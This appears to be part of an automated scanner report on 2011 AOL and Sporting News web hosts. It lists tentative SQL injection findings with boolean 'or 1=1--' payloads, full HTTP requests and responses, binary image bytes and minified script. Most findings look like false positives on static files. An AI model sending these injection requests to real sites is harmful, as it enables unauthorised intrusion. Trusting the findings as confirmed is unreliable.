<td><a href="http://fantasysource.sportingnews.com/baseball/team/17/cincinnati-reds" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cin</a></td>
</tr>
<tr class="alt">
<td class="rank">4</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/playe
...[SNIP]...

1.5. http://aol.sportingnews.com/services/sn-promos/yearbooks.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://aol.sportingnews.com
Path:	/services/sn-promos/yearbooks.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13762307%20or%201%3d1--%20 and 13762307%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/sn-promos/yearbooks.php?113762307%20or%201%3d1--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=295
Date: Thu, 05 May 2011 01:31:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1331

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #yearbooks * { margin:0; padding:0; line-height:1em; }
#yearbooks, #yearbooks a { display:block; width:180px; height:150px; overflow:hidden; }
#yearbooks .middle { width:100%; height:100%; background:url(http://st.snimg.com/image/promos/yearbooks/2011-pro-football-draft-guide-bg-180x150.png) no-repeat; }
#yearbooks .top { position:absolute; top:0; left:0; }
#yearbooks img.cover { margin:25px 0 0 12px; }
#yearbooks img.fade { margin:-50px 0 0 8px; }
#yearbooks a { position:absolute; top:0; left;:0; background:#fff; opacity:0; filter:alpha(opacity=0); }
</style>
<div id="yearbooks" class="ad-180x150">
<div class="middle">
<img src="http://st.snimg.com/image/yearbooks/pro-football-draft-guide/2011/2011Draft1-w100.jpg" class="cover" /><br />
<img src="http://st.snimg.com/image/promos/bg-fade-black.png" class="fade" />
<div class="top"><img src="http://st.snimg.com/image/promos/yearbooks/top-180x150.png" /></div>
</div>
<a href="https://www.streetandsmiths.com/index.cfm?fuseaction=store.covers&catid=7&year=2011" target="_blank" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Pro Football Draft Guide Yearbook | 180x150');"></a>
</div>

Request 2

GET /services/sn-promos/yearbooks.php?113762307%20or%201%3d2--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:31:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1280

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #yearbooks * { margin:0; padding:0; line-height:1em; }
#yearbooks, #yearbooks a { display:block; width:180px; height:150px; overflow:hidden; }
#yearbooks .middle { width:100%; height:100%; background:url(http://st.snimg.com/image/promos/yearbooks/2011-baseball-bg-180x150.png) no-repeat; }
#yearbooks .top { position:absolute; top:0; left:0; }
#yearbooks img.cover { margin:25px 0 0 12px; }
#yearbooks img.fade { margin:-50px 0 0 8px; }
#yearbooks a { position:absolute; top:0; left;:0; background:#fff; opacity:0; filter:alpha(opacity=0); }
</style>
<div id="yearbooks" class="ad-180x150">
<div class="middle">
<img src="http://st.snimg.com/image/yearbooks/baseball/2011/2011BB5-w100.jpg" class="cover" /><br />
<img src="http://st.snimg.com/image/promos/bg-fade-black.png" class="fade" />
<div class="top"><img src="http://st.snimg.com/image/promos/yearbooks/top-180x150.png" /></div>
</div>
<a href="https://www.streetandsmiths.com/index.cfm?fuseaction=store.covers&catid=1&year=2011" target="_blank" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Baseball Yearbook | 180x150');"></a>
</div>

1.6. http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://o.aolcdn.com
Path:	/os/fanhouse/design/v2/css/fanhouse.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17216175'%20or%201%3d1--%20 and 17216175'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/fanhouse17216175'%20or%201%3d1--%20/design/v2/css/fanhouse.css?version=172 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:36:02 GMT
Date: Thu, 05 May 2011 01:09:44 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/fanhouse17216175'%20or%201%3d2--%20/design/v2/css/fanhouse.css?version=172 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1159
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:10:14 GMT
Date: Thu, 05 May 2011 01:09:44 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1159

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style></style> </head><body><h1>HTTP Status 404 - Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css</u></p><p><b>description</b> <u>The requested resource (Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.7. http://o.aolcdn.com/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://o.aolcdn.com
Path:	/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 22210006'%20or%201%3d1--%20 and 22210006'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006'%20or%201%3d1--%20 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:47:14 GMT
Date: Thu, 05 May 2011 01:20:56 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006'%20or%201%3d2--%20 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1201
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:21:26 GMT
Date: Thu, 05 May 2011 01:20:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1201

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style></style> </head><body><h1>HTTP Status 404 - Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- </u></p><p><b>description</b> <u>The requested resource (Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- ) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.8. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://o.aolcdn.com
Path:	/os/mobile-desktop/js/mobileblog.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14243832'%20or%201%3d1--%20 and 14243832'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/mobile-desktop14243832'%20or%201%3d1--%20/js/mobileblog.js HTTP/1.1
Host: o.aolcdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Mon, 05 May 2014 04:24:32 GMT
Date: Thu, 05 May 2011 10:58:14 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/mobile-desktop14243832'%20or%201%3d2--%20/js/mobileblog.js HTTP/1.1
Host: o.aolcdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1147
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 10:58:44 GMT
Date: Thu, 05 May 2011 10:58:14 GMT
Content-Length: 1147
Connection: close

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style></style> </head><body><h1>HTTP Status 404 - Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js</u></p><p><b>description</b> <u>The requested resource (Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.9. http://o.aolcdn.com/os/realestate/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://o.aolcdn.com
Path:	/os/realestate/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 51809587'%20or%201%3d1--%20 and 51809587'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/realestate51809587'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:53:58 GMT
Date: Thu, 05 May 2011 01:27:40 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/realestate51809587'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Cteonnt-Length: 1120
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:28:10 GMT
Date: Thu, 05 May 2011 01:27:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1120

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style></style> </head><body><h1>HTTP Status 404 - Unknown File: /realestate51809587' or 1=2-- /favicon.ico</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /realestate51809587' or 1=2-- /favicon.ico</u></p><p><b>description</b> <u>The requested resource (Unknown File: /realestate51809587' or 1=2-- /favicon.ico) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.10. http://o.aolcdn.com/os_merge/ [file parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://o.aolcdn.com
Path:	/os_merge/

Issue detail

The file parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the file parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os_merge/?file=/aol/jquery-1.4.3.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.debug.min.js&file=/aol/jquery.multiauth-1.0.min.js'%20and%201%3d1--%20&file=/aol/jquery.globalheader-1.5.min.js&file=/aol/jquery.globalsearchbox-1.5.min.js&file=/aol/aol.relatedvideo.min.js&file=/music/js/delegate.js&file=/music/js/jquery.twitter.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.aolmostpopular.min.js&file=/music/js/feedback.js&file=/music/js/artist-legacy-hubs.js&v=5 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 02:18:22 GMT
Date: Thu, 05 May 2011 01:18:22 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 122281

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
;U.devId=(f.aolGetAuthToken.devId||devId);o(U)}})})}});n.replaceWith(G)}};f.fn.aolShare=function(l){return this.each(function(){l=l||{};l.elem=this;f.aolShare(l)})}})(jQuery,window,document);(function(g,i,m){var n=i.location,f=g(m),j=encodeURIComponent,l=0,d,e={namespace:"aol-multiauth",devId:"ao1ARQUlqDsixdht",successUrl:n.protocol+"//"+n.hostname+"/_uac/authReceiver.html",tabs:["aol","aim","facebook","google","yahoo","twitter"],branded:0,reload:0,lang:"en",locale:"us",snsAuthenticated:0,snsServer:"http://my.screenname.aol.com",authServer:"http://api.screenname.aol.com"},a={namespace:"aol-getToken",devId:"ao1ARQUlqDsixdht",authServer:"http://api.screenname.aol.com",callback:function(){}},c,h=[],b=0,o=navigator.userAgent.toLowerCase(),k=o.indexOf("safari")!==-1&&o.indexOf("chrome")===-1;g.multiAuth=function(q){if(q.authLink){var p=g.extend({},e,q),v=p.namespace,B=p.authServer,E=p.snsServer,z=p.devId,r=p.successUrl,F=p.authLink,G=p.branded,H=p.lang,A=p.locale,y=p.selectedTab,x=p.snsSiteDomain,D=p.snsPopupSiteState||j("OrigUrl="+j(r)),C=p.snsIframeSiteState||j("OrigUrl="+j(n)),t=p.snsAuthenticated;g.multiAuth.devId=z;function w(R,S){function T(U){b=0;U.preventDefault();var 